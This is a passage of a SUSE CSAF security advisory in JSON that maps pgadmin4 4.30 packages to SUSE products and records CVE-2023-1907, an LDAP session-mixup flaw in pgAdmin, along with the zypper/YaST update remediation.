},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-1907",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-1907"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability was found in pgadmin. Users logging into pgAdmin running in server mode using LDAP authentication may be attached to another user\u0027s session if multiple connection attempts occur simultaneously.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-1907",
"url": "https://www.suse.com/security/cve/CVE-2023-1907"
},
{
"category": "external",
"summary": "SUSE Bug 1234840 for CVE-2023-1907",
"url": "https://bugzilla.suse.com/1234840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
